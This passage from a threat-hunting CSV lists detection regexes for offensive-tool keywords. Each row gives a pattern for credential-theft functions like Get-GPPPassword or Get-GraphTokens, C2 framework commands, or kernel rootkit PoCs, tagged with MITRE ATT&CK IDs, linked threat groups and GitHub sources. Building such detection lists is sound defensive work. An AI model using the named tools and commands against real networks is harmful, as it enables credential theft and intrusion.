BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46022"
"*Get-FoxDump*",".{0,1000}Get\-FoxDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46023"
"*Get-FoxDump.ps1*",".{0,1000}Get\-FoxDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46024"
"*GetFullPrivsClient.exe*",".{0,1000}GetFullPrivsClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","46025"
"*GetFullPrivsDrv_x64.sys*",".{0,1000}GetFullPrivsDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","46026"
"*get-get-get-get/PowerProxy*",".{0,1000}get\-get\-get\-get\/PowerProxy.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","46027"
"*Get-GPOEnum*",".{0,1000}Get\-GPOEnum.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46029"
"*Get-GPOsPerOU*",".{0,1000}Get\-GPOsPerOU.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46030"
"*Get-GPOtoFile*",".{0,1000}Get\-GPOtoFile.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46031"
"*Get-GPPAutologon *",".{0,1000}Get\-GPPAutologon\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46032"
"*Get-GPPAutologon.*",".{0,1000}Get\-GPPAutologon\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46033"
"*Get-GPPAutologons*",".{0,1000}Get\-GPPAutologons.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46034"
"*getgppgroups  *",".{0,1000}getgppgroups\s\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46035"
"*Get-GPPInnerFields*",".{0,1000}Get\-GPPInnerFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46036"
"*getgpppassword *",".{0,1000}getgpppassword\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46037"
"*Get-GPPPassword -*",".{0,1000}Get\-GPPPassword\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46038"
"*Get-GPPPassword | more*",".{0,1000}Get\-GPPPassword\s\|\smore.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46039"
"*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46040"
"*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46041"
"*Get-GPPPassword.*",".{0,1000}Get\-GPPPassword\..{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46042"
"*Get-GPPPassword.json*",".{0,1000}Get\-GPPPassword\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46043"
"*Get-GPPPassword.ps1*",".{0,1000}Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","46044"
"*Get-GPPPassword.ps1*",".{0,1000}Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46045"
"*Get-GPPPassword.py*",".{0,1000}Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46046"
"*Get-GPPPasswords*",".{0,1000}Get\-GPPPasswords.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46047"
"*Get-GraphTokens*",".{0,1000}Get\-GraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Authenticate as a user to Microsoft Graph","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46048"
"*Get-GroupMembers -GroupName ""Account Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Account\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46049"
"*Get-GroupMembers -GroupName ""Domain Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Domain\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46050"
"*Get-GroupMembers -GroupName ""Enterprise Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Enterprise\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46051"
"*Get-GroupMembers -GroupName ""Server Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Server\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46052"
"*Get-HeadersWithPrtCookies*",".{0,1000}Get\-HeadersWithPrtCookies.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46053"
"*GetHijackableDllName*",".{0,1000}GetHijackableDllName.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","46054"
"*getHostnameFromCVARS(*",".{0,1000}getHostnameFromCVARS\(.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#content","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","46055"
"*Get-ImageNtHeaders*",".{0,1000}Get\-ImageNtHeaders.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - 